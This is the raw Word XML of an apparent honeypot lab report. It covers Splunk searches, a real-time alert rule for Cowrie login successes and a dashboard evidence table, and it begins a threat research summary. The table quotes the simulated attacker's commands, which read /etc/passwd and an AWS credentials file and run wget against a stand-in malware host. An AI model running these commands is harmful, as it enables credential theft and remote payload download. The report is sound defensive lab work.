          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.file_download</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | table _time </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44D77750" w14:textId="77777777" w:rsidR="00054BAC" w:rsidRDefault="00054BAC">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5957C1" w14:textId="72F890CA" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Attack timeline by hour:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118849F4"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 xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timechart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> count by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3489CA04" w14:textId="5BFC52FF" w:rsidR="0062444D" w:rsidRPr="00054BAC" w:rsidRDefault="00054BAC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A08EB8E" wp14:editId="57C4A6B5">
            <wp:extent cx="6172200" cy="2967355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="84520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05100" name="Picture 8452051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2967355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C1031" w14:textId="77777777" w:rsidR="00054BAC" w:rsidRPr="00A64122" w:rsidRDefault="00054BAC" w:rsidP="00054BAC">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 7: Splunk — Attack timeline by event type. All 65 events concentrated in a single automated burst at 22:38 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2517D405" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="3CA24171" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="4260CC8A" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="41AE2E46" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="147C0949" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="61B0E157" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="510E3863" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="256C1E5D" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="6AC68313" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="6EDBFD3A" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="34FF4393" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="2017ADA0" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="37707C40" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="71E23BB0" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="7DBF7166" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="30C2A33F" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="38C98FFF" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="5F040408" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="5F88F37B" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58"/>
    <w:p w14:paraId="1E2D921E" w14:textId="79D60323" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc231686580"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.3 Configure the Alert Rule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="554B5B9E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run the successful login search above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4706AA9E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Click Save As → Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC50A7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Name: Honeypot — Successful Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3F0E07" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alert Type: Real Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A09F2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Trigger Condition: Number of results is greater than 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C55DD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Action: Add to Triggered Alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6EE07" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Click Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65466E5D" w14:textId="3BE2383D" w:rsidR="0062444D" w:rsidRPr="00054BAC" w:rsidRDefault="00054BAC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7094547F" wp14:editId="49C5028A">
            <wp:extent cx="5727700" cy="5225479"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1827366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66090" name="Picture 1827366090"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731627" cy="5229062"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04CE4F" w14:textId="25FF353C" w:rsidR="0062444D" w:rsidRDefault="00054BAC">
      <w:r>
        <w:t xml:space="preserve">Figure 8: Splunk — Real-time alert rule active. Triggers on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>login.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> events exceeding zero within one minute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F8DCF6" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="4822AC80" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="142D4CE1" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="32312A37" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58"/>
    <w:p w14:paraId="1AFBC012" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58"/>
    <w:p w14:paraId="056B9574" w14:textId="5CC60597" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc231686581"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.4 Dashboard Evidence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5E7304A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0B513413" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Dashboard Panel</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45476178" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="1B76AA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D8615CA" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Top Attacker IPs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BFEDD26" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>One attacker IP: 192.168.56.26 — 65 total events, sole attack source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="781738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79184C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Successful Logins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A5DCDF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9 successful logins from 192.168.56.26 using username root at 22:38:15 on 2026-06-05. Passwords cycled: root, password, 123456, admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="2961E5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DED7F08" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Commands Typed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B2F1C6B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7 commands: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, cat /etc/passwd, cat /etc/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, cat /home/admin</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/credentials, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> http://malware.example.com/shell.sh, exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="4F5715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AB550D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Files Downloaded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EA8E04" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No files downloaded. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> on malware.example.com failed — domain does not resolve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="253EC2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ADDFEF7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Timeline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8B3A0D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All 65 events in a single burst at 22:30–23:00 on 2026-06-05. Zero activity in all other time slots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="1DF879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C85BB4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Alert Rule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72FA48" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Real-time alert configured: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cowrie.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>login.success</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; 0 triggers Add to Triggered Alerts — active and verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="605D8319" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="7E7B4FD6" w14:textId="1712EFDD" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc231686582"/>
      <w:r>
        <w:t>5.5 SIEM Integration Observations &amp; Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="5BB2CB50" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>All 65 events were recorded at 22:38 UTC on 5th June 2026 — a controlled simulation. In real deployments, attack timing reveals attacker geography. Mandiant's 2024 M-Trends Report documented that attacks peaking between 00:00–06:00 UTC consistently originate from Eastern European and Asian threat groups operating within their business hours — a passive attribution technique requiring no active investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E9E97" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The real-time Splunk alert configured for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>login.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> events represents a deliberate architectural decision. Unlike failed-login alerts that generate thousands of low-value notifications daily, a successful honeypot login is unambiguous — an attacker is inside. Splunk's real-time alert reduced theoretical dwell time from IBM's documented 197-day industry average to seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18870197" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E54C5B7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc231686583"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6. Threat Research Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="3F7B0BDF" w14:textId="690EA722" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc231686584"/>
      <w:r>
        <w:t>6.1 Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="6E835169" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Credential-based attacks against exposed SSH services cost organisations an average of $4.88 million per breach in 2024, yet most perimeter defences block attacks without capturing the intelligence needed to understand or prevent them. This project addresses that visibility gap by deploying a production-grade Cowrie SSH honeypot on Ubuntu Server 22.04, engineered to emulate a legitimate corporate file server and forensically document attacker behaviour from first connection to post-login exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED71C76" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The honeypot was systematically built, configured with realistic deception layers including fake AWS credentials and database passwords, integrated with a Splunk SIEM pipeline, and subjected to a controlled brute force simulation replicating real-world attack tooling. Splunk captured 65 total events, 9 successful logins, and 7 post-login commands — all executed within a single automated burst at 22:38:15 on 5th June 2026, confirming the fully automated nature of modern credential attacks documented by Rapid7 and Datadog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6BA352" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Post-login analysis mapped attacker behaviour across five MITRE ATT&amp;CK techniques — T1110, T1082, T1087, T1552, and T1105 — revealing a predictable reconnaissance-then-harvest-then-deploy playbook consistent with the 2025 European logistics breach where AWS credentials were stolen undetected for 47 days. A real-time Splunk alert rule reduced that theoretical dwell time to seconds, demonstrating that deception technology transforms attacker predictability from organisational vulnerability into actionable defensive intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565736F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="200A195B" w14:textId="33D1665F" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc231686585"/>
      <w:r>
        <w:t>6.2 Environment Summary</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1E208A47"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3E7B7C18" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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22547BDD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="38FCE1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1659A16" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
